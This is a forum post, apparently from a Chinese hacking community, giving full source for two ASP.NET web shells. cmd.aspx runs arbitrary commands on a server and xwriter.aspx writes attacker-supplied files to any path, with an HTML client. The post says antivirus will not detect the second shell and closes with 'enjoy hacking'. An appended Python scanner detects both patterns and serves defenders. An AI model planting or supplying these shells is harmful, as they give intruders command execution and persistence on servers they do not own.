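1. cmd.aspx
On the 邪惡八進制 (Evil Octal) forum (PS: does anyone know why the forum has been unreachable for the past few days?), a friend raised the problem that webadmin cannot pass arguments when executing commands. I found a heavily locked-down host to try it on, and sure enough there was a problem, so I modified my earlier cmd.aspx; please make do with it for now. The next version of webadmin 2.x will fix this problem.
Copy the following code and save it as an .aspx file: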
<%@ page language="vb" debug="true" %><%@ import namespace="system.io" %><%@ import namespace="system.diagnostics" %><script runat="server">
sub runcmd(src as object, e as eventargs)
dim myprocess as new process()
dim myprocessstartinfo as new processstartinfo(xpath.text) myprocessstartinfo.useshellexecute = false myprocessstartinfo.redirectstandardoutput = true
myprocess.startinfo = myprocessstartinfo
myprocessstartinfo.arguments=xcmd.text
myprocess.start()
dim mystreamreader as streamreader = myprocess.standardoutput
dim mystring as string = mystreamreader.readtoend()
myprocess.close()
mystring=replace(mystring,"<","<")
mystring=replace(mystring,">",">")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
end sub
</script>
<html>
<head>
<title>asp.net shell for webadmin2.x final</title>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
</head>
<body>
<form runat="server">
<asp:label id="l_p" runat="server" width="80px">program</asp:label>
<asp:textbox id="xpath" runat="server" width="300px">c:/windows/system32/cmd.exe</asp:textbox>
<br />
<asp:label id="l_a" runat="server" width="80px">arguments</asp:label>
<asp:textbox id="xcmd" runat="server" width="300px" text="/c net user">/c net user</asp:textbox>
<br />
<asp:button id="button" runat="server" width="100px" text="run"></asp:button>
<p>
<asp:label id="result" runat="server"></asp:label>
</p>
</form>
</body>
</html>
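2. xwriter.aspx
I remember there was a small ASP trojan that used FSO to save submitted text as a file. Although it is larger than the eval one, the code is completely legitimate, so antivirus software will not pick on it. Heh, the following code implements the same function in ASP.NET (you can modify it yourself and also insert it into an aspx file):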
<%@ page language="vb" %>
<%@ import namespace="system.io" %>
<script runat="server">
sub page_load(sender as object, e as eventargs)
dim mywrite as new streamwriter(request.form("path"), true, encoding.default) mywrite.write(request.form("content"))
mywrite.close
response.write("done!")end sub
</script>
The following is the client; copy it and save it as an .htm file:
<!doctype html public "-//w3c//dtd html 4.01 transitional//en""http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>xwriter.net by lake2</title>
</head>
<body>
<form name="form1" method="post" onsubmit="twosubmit(this);">
<div align="center">url:
<input name="url" type="text" value="http://www.xxx.com/a.aspx" size="60">
<br>
path:
<input name="path" type="text" id="path" value="e:/myweb/myown/a.txt" size="60">
<br>
<textarea name=content cols=120 rows=10 id="content" width=45>填入生成木馬的內容,最好是全英文</textarea>
<br>
<center>
<br>
<input type=submit value=提交>
<br>
enjoy hacking !!!!!! </div>
</body></html>
<script language="javascript">
function twosubmit(form1){
var url = document.form1.url.value;
form1.action=url;
form1.submit();
}
</script>
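For defenders, both server pages above leave recognisable server-side patterns: a `Process` started with shell execution disabled and its output redirected back to the page, and a `StreamWriter` opened on a path taken directly from the request. The Python scanner below is an added example, not part of the original post; the rule names, function names and sample strings are constructed here, and the case-insensitive matching also covers the same constructs written in C#.

```python
import os
import re

# Server-side code only: <script runat="server"> blocks and <% %> render blocks
# (directives "<%@" and comments "<%--" are skipped).
SERVER_CODE = re.compile(
    r"<script[^>]*\brunat\s*=\s*[\"']?server[^>]*>(.*?)</script>|<%(?![@-])(.*?)%>",
    re.IGNORECASE | re.DOTALL)

# Constructed heuristics; a rule fires only when every pattern in it matches.
RULES = {
    "process-exec-with-captured-output": [      # the cmd.aspx pattern
        r"\bprocessstartinfo\b",
        r"\buseshellexecute\s*=\s*false\b",
        r"\bredirectstandardoutput\s*=\s*true\b",
    ],
    "file-write-to-request-supplied-path": [    # the xwriter.aspx pattern
        r"\bstreamwriter\s*\(\s*request\b",
    ],
}

def server_code(page_text):
    blocks = [a or b for a, b in SERVER_CODE.findall(page_text)]
    # Handler files (.ashx) carry code with no wrapper, so fall back to the whole file.
    return "\n".join(blocks) if blocks else page_text

def scan_text(page_text):
    code = server_code(page_text)
    return sorted(name for name, pats in RULES.items()
                  if all(re.search(p, code, re.IGNORECASE) for p in pats))

def scan_webroot(root, exts=(".aspx", ".ascx", ".ashx", ".master")):
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    findings[path] = hits
    return findings

# Constructed sample inputs (fragments, not complete pages).
SAMPLE_EXEC = ('<script runat="server">\ndim p as new processstartinfo(xpath.text)\n'
               'p.useshellexecute = false\np.redirectstandardoutput = true\n</script>')
SAMPLE_WRITE = '<script runat="server">\ndim w as new streamwriter(request.form("path"), true)\n</script>'
SAMPLE_BENIGN = '<script runat="server">\ndim w as new streamwriter(server.mappath("~/app_data/log.txt"), true)\n</script>'

if __name__ == "__main__":
    for label, text in (("exec", SAMPLE_EXEC), ("write", SAMPLE_WRITE), ("benign", SAMPLE_BENIGN)):
        print(label, scan_text(text))
```

A hit is a lead for manual review rather than a verdict, since legitimate administration pages can match the first rule.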